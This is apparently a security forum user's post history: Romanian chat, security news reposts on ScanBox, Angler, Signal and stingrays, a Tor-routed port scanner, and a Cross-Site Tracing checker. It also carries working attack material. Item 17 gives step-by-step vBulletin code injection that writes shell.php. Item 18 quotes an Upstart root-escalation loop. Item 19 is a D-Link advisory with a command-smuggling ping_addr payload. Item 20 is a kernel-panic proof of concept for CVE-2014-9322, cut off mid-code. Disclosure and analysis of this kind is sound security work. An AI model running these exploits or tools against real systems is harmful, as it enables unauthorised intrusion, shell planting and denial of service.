Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Aerosol

    Nichita

    Bun venit. ( sau din ceea ce ai zis tu, Bine ai (re)venit! )
  2. Bravo @Kronzy sa ne anunti cat ti-au dat si daca iei HOF.
  3. 1.1 released 1.1 in attach, git updated. Kinda fast, but we just finished what we wanted to put in release, but missed to do this in deadline. changelog added popup menu for Process page added file properties dialog for Process page added descriptions for more object types added named pipes dialog (menu -> extras) added information for IoCompletion object type, including structured object body dump some code revision and corrections sha1 for attached files 20436c56cbb40c3c0b0078b375ae6f8fe0723ab7 *WinObjEx64.chm 6386213cabe7cca553b2a6eb20e06a147e159cce *WinObjEx64.exe Do not expect new versions soon, well except maybe serious bugfixes if they will be. Download Source
  4. ScanBox is a framework in the form of a JavaScript file. The function of ScanBox is to collect information about the visitor’s system without infecting the system. And this information includes things like the last page the user was on before visiting the compromised website, the OS of the system and the language settings of the system, the screen width and height, the web browsers used by the victim, the geographical location, security softwares used and programs like Java, Acrobat Reader, MS Office and Adobe Flash versions used. ScanBox also can log the keystrokes the victim is typing inside the website under the control of the attacker, which could include the passwords and other sensitive information of the users. And all this information is then sent to a remote C&C server controlled by the attackers. ScanBox’s goal is to collect information that will later be misused to compromise specific targets. The ScanBox framework has been deployed on several websites belonging to disparate companies and organizations in different countries. Attackers were able to compromise the website and include code that loaded a malicious JavaScript file from a remote server. ScanBox is particularly dangerous, as it doesn’t require malware to be successfully deployed to disk in order to steal information. Instead the key logging functionality would do the same work by simply requiring the JavaScript code to be executed by the web browser. The framework also facilitates surveillance, enabling attackers to exploit vulnerabilities in visitors’ systems by pushing & executing malware. ScanBox is designed to be a modular and reusable JavaScript based exploit kit. It allows a lesser number of sophisticated attackers to first compromise a website using basic attacks such as SQL injection or WordPress bugs and set up a waterhole attack to infect hundreds to thousands of victims who visit that website. Some of the recent attacks which used ScanBox are the following: Table 1: List Of Attacks Month Identified Country Sector/Type Scan Box domain August 2014 JP Industrial sector js.webmailgoogle.com September 2014 CN Uyghur code.googlecaches.com October 2014 US Think tank news.foundationssl.com October 2014 KR Hospitality qoog1e.com By analyzing the script used in these attacks, it has been found that the base codes are pretty much the same and they differ in implementation. This shows that different attackers are using ScanBox as a tool for their attack. The framework was altered according to the victims’ browsers and other factors in every case. Researchers say that the changes may be the result of the upgrades in the framework. The common codebase in all the attacks leads to a conclusion that all the attackers share some resources in using this framework. Working Step 1: The basic step of the ScanBox framework is to configure the C&C server. This server helps to collect and store the information obtained from the compromised website. Figure 1: ScanBox framework for collecting data Step 2: The collected information is first encrypted before sending it to the C&C server to ensure security. Figure 2: Function for data encryption Step 3: After completion of the encryption process the following request is passed: Figure 3: Request produced after encryption Step 4: The encrypted data finally reaches the C&C server and is decrypted to obtain the original data. These pieces of information are the key for starting the attack. Figure 4: Decrypted data Figure 5: Working of ScanBox framework Plugins Several plugins are loaded accordingly in between to extract the required information. These are selectively added to avoid any kind of suspicious alerts when the page loads. The following are some plugins used during the process: Pluginid 1: List the software installed in the system and also to check if the system is running any different versions of EMET (Enhanced Mitigation Experience Toolkit). Figure 6: Pluginid 1 code Pluginid 2: Determines Adobe Flash versions Pluginid 5: Determines Microsoft Office versions Pluginid 6: Enumerates Adobe Reader versions Pluginid 8: Lists Java versions Pluginid 21: Plants a keylogger inside the compromised website. It records all the keystrokes the person is typing in the website. The logs may include account password and other details. The recorded logs are sent to the corresponding command and control center. This information is later used to launch an attack against the particular user. The keylogger feature of ScanBox helps the attacker to collect the data without loading a malware from the disc. Therefore any malware removal tool won’t be able to find this. Figure 7: Keylogger plugin code The plugins required to load a page on different browsers are different. An attacker should be well aware of the version and type of browser used by the victim. According to the requirement, the plugins are loaded so that the desired result could be obtained. The following is the list of plugins loaded per browser on code.googlecaches.com. Table 2: Plugins loaded per browser on code.googlecaches.com Plugin ID Description Internet Explorer Chrome Firefox Safari 1 Software reconnaissance Y N N N 2 Browser plugin N Y Y Y 3 Flash recon Y Y Y Y 4 SharePoint recon Y N N N 5 Adobe PDF reader recon Y N N N 6 Chrome security plugins recon N N Y N 7 Java recon Y Y Y Y 8 Internal IP recon N Y N N 9 JavaScript keylogger Y Y Y Y It has been found that Google Chrome is less vulnerable to such attacks than others on the list due to their security update between the interval of 15 days, which makes it a bit difficult to carry out the attack. Also the Aviator Web browser set up by WhiteHat Security provides impressive privacy and security settings by default. Watering Hole Attack This is a type of attack is mainly targeted on businesses and organizations. Waterholing attacks drive the ScanBox framework. The attacker keeps an eye on the websites the victim visits frequently and infects the websites with a malware. These type of attacks are hard to detect. Once the targeted victim enters the infected website, the malware finds a way into the victim’s network or system. The dropped malware may be in the form of a Remote Access Trojan (RAT), which allows the attacker to access delicate and personal information. The main goal of the watering hole attack is not to serve maximum malware to the system, but to exploit the websites frequently visited by the targeted victim. Figure 8: Watering hole working A watering hole attack could be carried out with the help of ScanBox framework. In this method the JavaScript does its job and saves the attacker from using a malware. This type of attack using ScanBox has much more efficiency than using a malware and could not be detected by any malware removal tool. You can see the list of watering hole attacks which used ScanBox in Table 1. Precautions Regular Software Updating: Timely upgrade on the software reduces the vulnerability of such attacks. Vulnerability Shielding: It helps to scan suspicious traffic and any deviation from the normal protocols used. Network Traffic Detection: Even though hackers find different ways to access the information, the traffic generated by the final malware in communicating with the C&C server remains consistent. Identifying these paths helps to take control of the effect of such attacks. Threat Intelligence: A subscription of prominent threat intelligence providers will help you to track down all the command and control servers that it connects to. These C&C servers can be fed to proxy or perimeter devices to see any successful communication has been established or not. Least privilege: The concept of least privilege has to be implemented on all users who log on to the machine. Admin privilege has to be limited to certain users only. Next generation firewall: Use of a next generation firewall can detect such type of attacks easier, as they have an inbuilt sandbox. SIEM: By using a SIEM solution, security administrators will be able to monitor all the traffic by capturing the logs. It will give a holistic view of what is happening on your network with a few clicks on a single dashboard. Conclusion By the detailed analysis of ScanBox framework, we can say that it could be very dangerous if the user is not cautious. Thorough monitoring and analysis of computer and network should keep such attacks bolted to an extent. References Cyber security updates: October 2014 ScanBox Framework — Krebs on Security https://www.alienvault.com/open-threat-exchange/blog/ScanBox-a-reconnaissance-framework-used-on-watering-hole-attacks AlienVault discovered Watering Hole attacks using Scanbox for reconnaissanceSecurity Affairs Source
  5. The sanctity of Apple iMessage end-to-end encryption has been challenged by white hats who in 2013 reverse engineered the protocol behind it, revealing that Apple controls the key infrastructure and could, in turn, be compelled to turn over messages via government order. CEO Tim Cook denied those charges last September in an interview, but nonetheless, confidence in the security of messages sent over iMessage hasn’t been 100 percent since. Researcher Moxie Marlinspike’s Open WhisperSystems today released version 2.0 of the free Signal app for Apple iOS, which now adds end-to-end encrypted messaging to the encrypted voice calling introduced last July with Signal 1.0. The private messaging support for iPhone is free and open source—and not the last step for Marlinspike, who is also responsible for RedPhone, an app that encrypts calls on the Android platform, and TextSecure for Android, a private text and chat app that is at the heart of today’s Signal 2.0 release for the iPhone. “We’re going to unify TextSecure and RedPhone into Signal on Android, release a desktop version of Signal, and keep working to push the envelope of secure protocols and private communication,” Marlinspike said of his planned product road map. For now, the availability of Signal 2.0 for iOS brings a measure of privacy and secure communication that’s been in question since the QuarksLab report of 2013. “It’s technically possible that someone in control of Apple’s servers could intercept your communication,” Marlinspike said, adding that Signal 2.0 now allows iPhone users to communicate privately with users on the Android platform. The protocol behind Signal 2.0 also supports forward secrecy, which essentially generates a new encryption key for each message, meaning that if a key were cracked in the future, not all messages would be in danger. Signal 2.0, Marlinspike also said, allows users to verify each other’s respective encryption keys, meaning that it would be an easy detect if an attacker was sitting in a man-in-the-middle position intercepting traffic between endpoints. For now, both ends of a conversation require Signal to be installed in order to assure secure communication, Marlinspike said. The simplicity of Signal should remove any impediment for privacy conscious users. The app uses the phone’s existing phone number and address book and does not require a separate log-in or authentication mechanism to manage. Users are able to send encrypted group messages (text, video, photos) and make encrypted phone calls worldwide without extra charges, Marlinspike said. “We cannot hear your conversations or see your messages, and no one else can either. No exceptions. You can even tap and hold on a contact’s name to see advanced identity verification options,” says Signal 2.0’s product description. “Everything in Signal is always end-to-end encrypted and painstakingly engineered in order to keep your communication safe.” The source code is available on Github for inspection, as well, Marlinspike said. Source
  6. Attackers behind the Angler Exploit Kit have added a tweaked version of an exploit for a patched Internet Explorer use-after-free vulnerability. Microsoft patched the vulnerability (MS14-056) in last October’s round of Patch Tuesday updates but that hasn’t stopped attackers from adding the vulnerability to the exploit toolkit. Similar to exploits disclosed in October, the sample Angler is using has been modified to bypass IE’s mitigation technology MEMPROTECT. According to Dan Caselden, a ?staff research scientist at FireEye who blogged on Friday about the vulnerability being included in Angler , this one is a use after free with MSHTML!CTitleElement that MEMPROTECT was not originally supposed to mitigate. Caselden claims the attack angle is interesting on its own because it focuses on IE deployments that use MEMPROTECT – introduced in July 2014 – but added that the vulnerability also cements the idea that attackers remain interested in compromising IE, especially against users running nearly five-month-old versions of it. Still, the use after free is not a generic exploit – some of its techniques weren’t necessary, Caselden adds – and going forward attackers will still have to find their way around the MEMPROTECT technology. “Some of the employed techniques (particularly the modified garbage collection routine) were not necessary,” Caselden wrote, “So in the future, exploit authors will need to find a reliable way around the delayed free, or bugs with another object that falls outside of the CMemoryProtector’s domain.” Chinese researchers with Keen team (a/k/a k33nteam) first talked about how (.PDF) to exploit a use after free vulnerability against MEMPROTECT at the Taiwanese security conference Hitcon X over the summer and went describe how it bypasses memory protection and isolated heap in Windows 8.1 shortly after the bug was patched by Microsoft, in a blog entry last October. Caselden gets much deeper into the exploit and points out the similarities from k33nteam’s proof of concept and the Angler sample on FireEye’s blog. For example, unlike the October exploit, this one can also optionally serve up a Flash zero day (CVE-2015-0313) – one of the three that plagued the Adobe software last month – that was also previously seen being used by Angler. Microsoft introduced MEMPROTECT, or MemoryProtection, in a July 2014 patch for IE and while the heap mitigation technology isn’t failsafe, it was thought to be effective against use after free vulnerabilities. For a short period it seemed as if the move would curb the number of IE exploits spotted in the wild, as attackers wouldn’t have to reuse dated IE use after free exploits. Naturally attackers were able to come up with ways around this. Attackers that have long had it out for Microsoft’s Internet Explorer and continue to take old, since-patched exploits and add them to their exploit kits just to see what sticks. In January attackers added a nasty, previously unknown Flash zero day that targeted IE on Windows 7 and 8 to the kit. An analysis of Angler last month called it the most sophisticated kit on the market, namely because it’s been the fastest to integrate newly released zero days and because its obfuscation is reportedly at the top of its game. Source
  7. Oricum o sa scape fiindca nu au facut nimic ilegal. Cat despre partea cu "au fost lacomi" cred ca toti ar fi facut la fel...
  8. FOR YEARS THE government has kept mum about its use of a powerful phone surveillance technology known as a stingray. The Justice Department and local law enforcement agencies insist that the only reason for their secrecy is to prevent suspects from learning how the devices work and devising methods to thwart them. But a court filing recently uncovered by the ACLU suggests another reason for the secrecy: the fact that stingrays can disrupt cellular service for any phone in their vicinity—not just targeted phones—as well as any other mobile devices that use the same cellular network for connectivity as the targeted phone. Civil liberties groups have long asserted that stingrays are too invasive because they can sweep up data about every phone in their vicinity, not just targeted phones, and can interfere with their calls. Justice Department and local law enforcement agencies, however, have refused to confirm this or answer other questions about the tools. But in the newly uncovered document (.pdf)—a warrant application requesting approval to use a stingray—FBI Special Agent Michael A. Scimeca disclosed the disruptive capability to a judge. “Because of the way, the Mobile Equipment sometimes operates,” Scimeca wrote in his application, “its use has the potential to intermittently disrupt cellular service to a small fraction of Sprint’s wireless customers within its immediate vicinity. Any potential service disruption will be brief and minimized by reasonably limiting the scope and duration of the use of the Mobile Equipment.” The document was previously sealed and only came to light after the defense attorney for a defendant in the case filed a motion last year to dismiss evidence collected by the stingray. It’s the first time the ACLU has seen the FBI acknowledge the stingray’s disruptive capabilities and raises a number of questions about the nature of the disruption and whether the Federal Communications Commission knew about it when it certified the equipment. “We think the fact that stingrays block or drop calls of cell phone users in the vicinity should be of concern to cell service providers, the FCC, and ordinary people,” says Nate Wessler staff attorney with the ACLU’s Speech, Privacy, and Technology Project. “If an emergency or important/urgent call (to a doctor, a loved one, etc.) is blocked or dropped by this technology, that’s a serious problem.” Stingrays are mobile surveillance systems the size of a small briefcase that impersonate a legitimate cell phone tower in order to trick mobile phones and other mobile devices in their vicinity into connecting to them and revealing their unique ID and location. Stingrays emit a signal that is stronger than the signal of other cell towers in the vicinity in order to force mobile phones and other devices to establish a connection with them and reveal their unique ID. Stingrays can then determine the direction from which the phone connected with them, data that can then be used to track the movement of the phone as it continuously connects to the fake tower. Although stingrays are designed to recognize 911 calls and let them pass to legitimate cell towers without connecting to the stingray, the revelation from the FBI agent raises the possibility that other kinds of emergency calls not made to 911 may not get through. Law enforcement agencies around the country have been using variations of the stingray since the mid-90s to track the movement of suspects in this way. The technology is used by the FBI, the Secret Service, the U.S. Marshals Service, Customs and Border Patrol agents and the Drug Enforcement Agency as well as local law enforcement agencies in more than a dozen states. But the secrecy around their use has been extreme, due in part to non-disclosure agreements that law enforcement agencies sign with the companies that make stingrays. Stingrays Cloaked in Secrecy Authorities in several states have been caught deceiving judges and defense attorneys about how they use the controversial technology or have simply used the devices without obtaining a warrant in order to avoid disclosing their use to a court. In other cases they have withheld information from courts and defense attorneys about how the stingrays work, refraining from disclosing that the devices pick up location data on all systems in their vicinity, not just targeted phones. Law enforcement agencies have even gone so far as to intervene in public records requests to prevent the public from learning about the technology. The revelation in the court document is therefore significant and also begs the question: Who else knew about this capability and for how long? The Federal Communications Commission is responsible for certifying equipment that operates on radio frequencies to make sure that devices comply with certain technical standards and do not cause radio interference. If the companies that make stingrays failed to disclose the disruption of service to the federal agency, it would mean the devices had potentially been approved under false pretenses. The Harris Corporation in Florida—the leading maker of stingrays for law enforcement in the U.S. and an aggressive proponent of secrecy around their use—has already been singled out for a questionable statement the company made to the FCC in a 2010 email. In the correspondence, a Harris representative told the FCC that the technology was used by law enforcement only “in emergency situations.” But according to records the ACLU obtained from the police department in Tallahassee, Florida, in nearly 200 cases that the equipment was used since 2007 only 29 percent of these involved an emergency. Stingrays are regularly used in day-to-day criminal investigations to track suspected drug dealers, bank robbers and others. The FCC certified stingray equipment from Harris in April 2011 and March 2012. Asked whether the company disclosed the stingray’s disruptive capabilities to the FCC when it sought certification, an FCC official told WIRED, “We can’t comment on how the devices operate because that information is confidential in accordance with the FCC’s application process.” She said Harris had specifically “requested confidentiality in the application process.” She also said that if “wireless customers experiencing unexplained service disruptions or interference” report it to the FCC, the agency will “investigate the causes.” How Stingray Disruption Works The case in which the FBI disclosed the service disruption is ongoing and involves a defendant named Claude Williams who was suspected of participating in a string of armed bank robberies. In July 2012, the FBI’s Scimeca submitted an application for a warrant to use a stingray to track Williams’s phone. Although Scimeca was seeking authorization to use a stingray, he referred to it alternatively as mobile pen register and trap and trace equipment in his application. The nomenclature is important because the ACLU has long accused the government of misleading judges by using this term. Pen registers record the numbers dialed from a specific phone number, while trap and trace devices record the numbers that dial into a particular number. But stingrays are used primarily to track the location and movement of a device. Although Scimeca disclosed to the magistrate that the equipment could disrupt phone service, he didn’t elaborate about how the disruption might occur. Experts suspect it has something to do with the “catch-and-release” way stingrays work. For example, once the stingray obtains the unique ID of a device, it releases it so that it can connect to a legitimate cell tower, allowing data and voice calls to go through. “As each phone tries to connect, [the stingray] will say, ‘I’m really busy right now so go use a different tower. So rather than catching the phone, it will release it,” says Chris Soghoian, chief technologist for the ACLU. “The moment it tries to connect, [the stingray] can reject every single phone” that is not the target phone. But the stingray may or may not release phones immediately, Soghoian notes, and during this period disruption can occur. Disruption can also occur from the way stingrays force-downgrade mobile devices from 3G and 4G connectivity to 2G to get them to connect and reveal their unique ID and location. In order for the kind of stingray used by law enforcement to work, it exploits a vulnerability in the 2G protocol. Phones using 2G don’t authenticate cell towers, which means that a rogue tower can pass itself off as a legitimate cell tower. But because 3G and 4G networks have fixed this vulnerability, the stingray will jam these networks to force nearby phones to downgrade to the vulnerable 2G network to communicate. “Depending on how long the jamming is taking place, there’s going to be disruption,” says Soghoian. “When your phone goes down to 2G, your data just goes to hell. So at the very least you will have disruption of internet connectivity. And if and when the phones are using the stingray as their only tower, there will likely be an inability to receive or make calls.” “A Grave Threat to Privacy” Concerns about the use of stingrays is growing. Last week, Senator Bill Nelson (D—Florida) sent a letter to the FCC calling on the agency to disclose information about its certification process for approving stingrays and any other tools with similar functionality. Nelson asked in particular for information about any oversight put in place to make sure that use of the devices complies with the manufacturer’s representations to the FCC about how the technology works and is used. Nelson also raised concerns about their use in a remarkable speech on the Senate floor. The Senator said the technology “poses a grave threat to consumers’ cellphone and Internet privacy,” particularly when law enforcement agencies use them without a warrant. He also noted that invasive devices like the stingray will inevitably force lawmakers to come up with new ways to protect privacy. His combative speech marks the first time a lawmaker has called out the controversial technology in the public chamber. But his speech was also remarkable for another reason: Nelson’s state of Florida is home to the Harris Corporation, and the company is his second biggest campaign donor. Source
  9. Nu ai patit niciodata sa se opreasca si sa-si dea "Resetare din fabrica?" eu am patit in 3 ani de 5 ori. + ca e cam greu cu aplicatiile daca il iei ca sa te joci, dar in rest ca telefon e ok.
  10. Stau si ma gandesc, astia cand se plictisesc intra pe facebook altora sa vada ce vorbesc cu mama, tata sau iubita ( cred ca se sparg de ras la unii ) Oricum asta sa fie invatare de minte pentru cei care cred ca facebook e o metoda 100% privata de socializare.
  11. Pai hai sa ne uitam putin pe : Test antivirus software for Windows 7 - December 2014 | AV-TEST Dupa cum observati toti: Versiunea Avast Free este mai buna decat versiunea AVG Internet Security ) ( asta spune totul ) cat despre versiunea free cel putin penibil...
  12. fpd chiar poate fi considerata o vulnerabilitate information gathering de level 1 ( desi pare ceva neinsemnat ), deoarece iti arata path-ul si user-ul de la ftp , un brute mic si poti lua acces. Mai multe despre FPD gasesti -> Full Path Disclosure - Hakipedia Scuze ca raspund mai greu dar lucrez la ceva... Deci J, acela este path-ul , tu nu faci brute pe path faci pe user. @Webz n-ai ce $$$$ sa iei man, e doar FPD.
  13. Nu e cine stie ce dar l-am postat fiidca era in subdomeniu toshiba
  14. # tmap 0.1 # Coded by TheKingOf9x <AT> yandex . com # Fast multi-threaded port scanner which tunnels through TOR. # Depends on the PySocks library: https://github.com/Anorov/PySocks # And of course TOR: apt-get install tor # # Do not use hostnames, may leak DNS info. only use IP addresses. # # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this. # # Usage: # python tmap.py import sys import socks import datetime import threading lock = threading.Semaphore(value = 1) #Port of TOR server TOR_PORT = 9050 #timeout. Experiment with this. TIMEOUT = 20 #Port list to scan, ammend at will ports = (21,22,23,80,443,1433,3306,8080) def main(): if len(sys.argv) < 3: print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m") print("Single host scan:\npython " + sys.argv[0] + " -s 192.168.0.1\n") print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n") print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n") exit(0) scan_type = sys.argv[1] parameter = sys.argv[2] filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap") try: log = open(filename, "a") except: pass if scan_type == "-s": host_scan(parameter, log) elif scan_type == "-r": range_scan(parameter, log) elif scan_type == "-l": list_scan(parameter, log) else: exit(1) #main connect function def connect(ip, port, log): try: s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', TOR_PORT) s.settimeout(TIMEOUT) s.connect((ip, port)) output = ip + ":" + str(port) lock.acquire() # Lock/unlock to clean up screen output. print(output) try: log.write(output + "\n") except: pass except: pass finally: lock.release() def host_scan(ip, log): ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass def range_scan(ip, log): ip = ip.strip() for i in range(1, 255): ip_addr = ip + "." + str(i) for port in ports: try: t = threading.Thread(target=connect, args=(ip_addr, port, log)) t.start() except: pass def list_scan(parameter, log): try: f = open(parameter, 'r') except: print("Could not open file: " + parameter) exit(1) for ip in f: ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass if __name__ == '__main__': main() Download Source
  15. #!/usr/bin/python # Cross-Site Tracer by 1N3 v20150224 # https://crowdshield.com # # ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;' # # USAGE: xsstracer.py <IP/host> <port> # import socket import time import sys, getopt class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def main(argv): argc = len(argv) if argc <= 2: print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC sys.exit(0) target = argv[1] # SET TARGET port = argv[2] # SET PORT buffer1 = "TRACE / HTTP/1.1" buffer2 = "Test: <script>alert(1);</script>" buffer3 = "Host: " + target print "" print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 " print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com" print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) result=s.connect_ex((target,int(port))) s.settimeout(1.0) if result == 0: s.send(buffer1 + "\n") s.send(buffer2 + "\n") s.send(buffer3 + "\n\n") data = s.recv(1024) script = "alert" if script.lower() in data.lower(): print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC print "" print bcolors.WARNING + data + bcolors.ENDC else: print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" print "" print "" else: print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC s.close() main(sys.argv) Download Source
  16. WordPress Calculated Fields Form 1.0.10 SQL Injection WordPress WP All 3.2.3 Shell Upload WordPress Photocrati Theme 4.x.x SQL Injection WordPress Newsletter 2.6.x / 2.5.x Open Redirect WordPress Max Banner Ads 1.9 Cross Site Scripting WordPress Ya'aburnee / Dignitas Privilege Escalation WordPress Contact Form DB 2.8.29 Cross Site Request Forgery
  17. ################################################################################################################# [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability [+] Discovered By: Dariush Nasirpour (Net.Edit0r) [+] My Homepage: black-hg.org / nasirpour.info [+] Date: [2015 27 February] [+] Vendor Homepage: vBulletin.com [+] Tested on: [vBulletin 4.2.2] [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) ################################################################################################################# Remote Code Injection: +++++++++++++++++++++++++ 1) You Must Register In The vBulletin http://www.victim.com/register.php example:[blackhat] 2) go to your user profile example: [http://black-hg.org/cc/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL: http://black-hg.org/cc/visitormessage.php?do=message [Post data] message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]" 5- Open hackbar and tamper it with taper data: referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit request. ################################################################################################################ Source
  18. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Although just reported to Ubuntu, this minor dev-branch issue was already made public. As the launchpad/lkml/... feed-miners should not play all the games alone, and as others may want to learn how beginner errors still make it into packages of quite large distributions, enjoy the power of for session in /run/user/*/upstart/sessions/* do env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true done executed as root. See [1] hd [1] http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/ - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iEYEARECAAYFAlTwJXEACgkQxFmThv7tq+4LKgCcCKMaOdO0xObIno415g6qZAxp LZQAnj8giZDPkLYZPD/TVhY958/vXMSJ =xyAX -----END PGP SIGNATURE----- Source
  19. ############################################################################# # # SWISSCOM CSIRT SECURITY ADVISORY - http://www.swisscom.com/security # ############################################################################# # # CVE ID: CVE-2015-1187 # Product: D-Link DIR636L # Vendor: D-Link # Subject: Remote Command Injection - Incorrect Authentication # Effect: Remotely exploitable # Author: Tiago Caetano Henriques, tiago.caetanohenriques AT swisscom.com # Stephan Rickauer, Swisscom CSIRT (csirt AT wisscom.com) # Date: March 2nd 2015 # ############################################################################# Introduction ------------ Tiago Caetano Henriques discovered a security flaw in D-link DIR-636L router that enables an attacker on the same network to execute arbitrary commands without being authenticated. Vulnerable ---------- D-Link DIR-636L and possibly other versions as seen on [1]. Patches ------- None existant at the moment. Description ----------- The D-Link DIR636L (possibly others) incorrectly filters input on the 'ping' tool which allows to inject arbitrary commands into the router. Secondly, authentication is not being performed correctly. This enables a remote attacker to gain full control of the router, for example to attack other networks in a DDoS style attack, or even expose computers behind these devices to the internet as you are able to change firewall/nat rules on this router. Attack vector ------------- A URL encoded POST request with the values in front of ping_addr= such as the following, will go through and will execute the command in front of &. POST /ping.ccp HTTP/1.1 Host: 192.168.0.1 ... X-Requested-With: XMLHttpRequest Referer: http://192.168.0.1/tools_vct.asp Content-Length: 64 Cookie: ccp_act=ping_v4&ping_addr=%31%39%32%2e%31%36%38%2e%30%2e%31%30%37%20%26%20%2f %62%69%6e%2f%70%69%6e%67%20%39%34%2e%32%33%2e%37%38%2e%32%33%31 Milestones ---------- Nov 30th 2014 Vulnerability discovered by Tiago Caetano Henriques Dec 18th 2014 Vulnerability reported to Swisscom CSIRT Jan 7th 2015 CVE ID requested at MITRE Jan 18th 2015 CVE ID 2015-1187 assigned by MITRE Feb 2th 2015 Vendor contact established and provided with technical details Feb 16th 2015 Vendor acknowledged issue and communicates time line for patches Feb 26th 2015 Full Disclosure by Peter Adkins Mar 2nd 2015 Forced Public Release of this Advisory due to the previous Full Disclosure at [1] References ---------- [1] https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2 Source/url]
  20. /* ---------------------------------------------------------------------------------------------------- * cve-2014-9322_poc.c * * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not * properly handle faults associated with the Stack Segment (SS) segment * register, which allows local users to gain privileges by triggering an IRET * instruction that leads to access to a GS Base address from the wrong space. * * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic. * * I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!) * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ * * * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread * * Emeric Nasi - www.sevagas.com *-----------------------------------------------------------------------------------------------------*/ // Only works on x86_64 platform #ifdef __x86_64__ /* ----------------------- Includes ----------------------------*/ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/syscall.h> #include <sys/mman.h> #include <asm/ldt.h> #include <pthread.h> #include <sys/time.h> #include <inttypes.h> #include <stdbool.h> #include <errno.h> #include <sys/user.h> /* ----------------------- definitions ----------------------------*/ #define TARGET_KERNEL_MIN "3.0.0" #define TARGET_KERNEL_MAX "3.17.4" #define EXPLOIT_NAME "cve-2014-9322" #define EXPLOIT_TYPE DOS #define FALSE_SS_BASE 0x10000UL #define MAP_SIZE 0x10000 /* ----------------------- Global variables ----------------------------*/ struct user_desc new_stack_segment; /* ----------------------- functions ----------------------------*/ /** * Creates a new segment in Local Descriptor Table */ static bool add_ldt(struct user_desc *desc, const char *name) { if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0) { return true; } else { printf("[cve_2014_9322 error]: Failed to create %s segment\n", name); printf("modify_ldt failed, %s\n", strerror(errno)); return false; } } int FLAG = 0; void * segManipulatorThread(void * none) { new_stack_segment.entry_number = 0x12; new_stack_segment.base_addr = 0x10000; new_stack_segment.limit = 0xffff; new_stack_segment.seg_32bit = 1; new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */ new_stack_segment.read_exec_only = 0; new_stack_segment.limit_in_pages = 0; new_stack_segment.seg_not_present = 0; new_stack_segment.useable = 0; new_stack_segment.lm = 0; // Create a new stack segment add_ldt(&new_stack_segment, "newSS"); // Wait for main thread to use new stack segment sleep(3); // Invalidate stack segment new_stack_segment.seg_not_present = 1; add_ldt(&new_stack_segment, "newSS disable"); FLAG = 1; sleep(15); return NULL; } /** * DOS poc for cve_2014_9322 vulnerability */ int 